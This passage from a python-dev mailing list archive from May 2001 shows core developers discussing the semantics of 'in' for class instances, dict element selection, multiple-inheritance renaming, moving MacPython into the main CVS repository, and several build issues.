implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". 
But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). Will do! From guido@digicool.com Sat May 5 22:48:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. 
Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. (I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 22:24:58 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. 
"except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erroneously assumed that the looping behavior was *introduced* when __contains__ was added. > ... > No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido@digicool.com Sat May 5 23:31:05 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>.
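Tim's masking scenario is easy to reproduce in Python. The sketch below assumes Python 3, and the classes Resolver and Proxy are hypothetical stand-ins for the global_resolver example. When a __getattr__ hook itself fails with AttributeError, anything that treats that exception as "attribute absent" hides the real bug. (Modern Python looks up special methods such as __contains__ on the type, so the "in" operator itself no longer consults __getattr__. hasattr() and getattr() with a default still do.)

```python
class Resolver:
    """Hypothetical resolver that has 'lost' its resolve() method."""

global_resolver = Resolver()

class Proxy:
    def __getattr__(self, attr):
        # Called only when normal lookup fails. The bug below also raises
        # AttributeError, so callers cannot tell it from "no such attribute".
        return global_resolver.resolve(self, attr)

p = Proxy()

# hasattr() treats any AttributeError as "missing", so the bug is masked.
print(hasattr(p, "__contains__"))  # False

# A direct lookup surfaces the underlying failure.
try:
    p.__contains__
except AttributeError as exc:
    message = str(exc)
print(message)  # 'Resolver' object has no attribute 'resolve'
```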
Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. > > I don't believe I ever knew that! Thanks. I erronesouly assumed that the > looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 22:53:51 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence ? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). 
I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul@pfdubois.com Sun May 6 02:10:37 2001 From: paul@pfdubois.com (Paul F. Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause,

    class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

    class X (Y, Z):
        b = Y.a
        d = Y.c
        bar = Z.foo

I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicitly defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson@baltimore.com Sun May 6 17:26:00 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG? Thanks Greg From tim.one@home.com Sun May 6 19:15:57 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though:

    def arb(dict):
        k, v = pair = dict.popitem()
        dict[k] = v  # restore the entry
        return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers:

    def arb(dict):
        if dict:
            return dict.iteritems().next()
        raise KeyError("arb passed an empty dict")

> If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful?
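Tim's distinction between an *arbitrary* and a *random* entry, and his warning about the "pick a slot, then slide over" shortcut, can be checked with a small Python 3 sketch. The slot table here is a plain list with `None` for holes, a simplified stand-in for the real dict layout (an assumption, not CPython's actual structure). With forward sliding, each entry is reached from its own slot plus every contiguous hole just before it; drawing a fresh slot after hitting a hole (rejection sampling) instead gives every entry the same chance. `arb` is Tim's non-mutating function in Python 3 spelling; `slide_counts` and `random_entry` are hypothetical helpers.

```python
import random


def arb(d):
    """Return an arbitrary (key, value) pair without mutating d."""
    if d:
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


def slide_counts(table):
    """Count how many starting slots land on each entry when a probe
    slides forward (wrapping around) to the first non-hole."""
    if all(slot is None for slot in table):
        raise ValueError("table has no entries")
    n = len(table)
    counts = {}
    for start in range(n):
        i = start
        while table[i] is None:
            i = (i + 1) % n
        counts[table[i]] = counts.get(table[i], 0) + 1
    return counts


def random_entry(table, rng=random):
    """Uniform choice: on hitting a hole, draw a fresh slot instead of sliding."""
    if all(slot is None for slot in table):
        raise ValueError("table has no entries")
    while True:
        slot = table[rng.randrange(len(table))]
        if slot is not None:
            return slot


table = [None, None, None, "a", "b", None, "c", None]
print(slide_counts(table))  # {'a': 5, 'b': 1, 'c': 2} out of 8 slots
```

So sliding would pick `a` five times as often as `b`. Since Python 3.7 dicts preserve insertion order, so `arb` in this spelling always returns the first-inserted pair: arbitrary in Tim's sense, but not random.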
popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set

From jack@oratrix.nl Mon May 7 10:39:43 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically.
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack@oratrix.nl Mon May 7 10:45:59 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform-dependent sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack@oratrix.nl Mon May 7 10:49:17 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path means I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in?
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis@informatik.hu-berlin.de Mon May 7 10:53:54 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido@digicool.com Mon May 7 15:00:08 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! 
The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) 
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Mon May 7 14:04:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas@python.ca Mon May 7 14:14:52 2001 From: nas@python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, it's still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform-dependent sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf substitution?
Neil From jack@oratrix.nl Mon May 7 14:17:18 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly. The write permission for other MacPython developers shouldn't be a problem, I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack@oratrix.nl Mon May 7 14:27:14 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? 
> > How would this work? Would MACHDEP_OBJS be set by an autoconf > substitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas@python.ca Mon May 7 14:30:42 2001 From: nas@python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal@lemburg.com Mon May 7 19:44:55 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week.
> While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simple examples in the standard library. > It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin@loewis.home.cs.tu-berlin.de Mon May 7 22:21:27 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows you to merge parts of the tree into a single sandbox. E.g. you could do

    macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside with /python, or a CVSROOT/modules entry). You could use an exclude list, e.g.

    macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules similar to Unix mount(1)ed file systems.
Regards, Martin From tim.one@home.com Tue May 8 05:14:22 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format. Since it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. After the patch, the fix works if and only if test_import doesn't fail, neither after deleting all .pyc/.pyo files first, nor if run a second time w/o deleting .pyc/.pyo. Works on Win98SE, but you may have already guessed that . From tim.one@home.com Tue May 8 05:52:37 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes be made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're having trouble sleeping tonight . From thomas@xs4all.net Tue May 8 11:14:20 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A.
Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope: >>> class string: ... pass ... >>> from string import split >>> string >>> That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas@per.dem.csiro.au Tue May 8 11:34:37 2001 From: Mark.Favas@per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas@xs4all.net Tue May 8 12:36:38 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? 
In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers: > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") You probably want: arb = dict.iteritems().next so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Tue May 8 13:10:00 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? 
The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependent #ifdefs and differently-defined macros we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Tue May 8 13:13:39 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread!
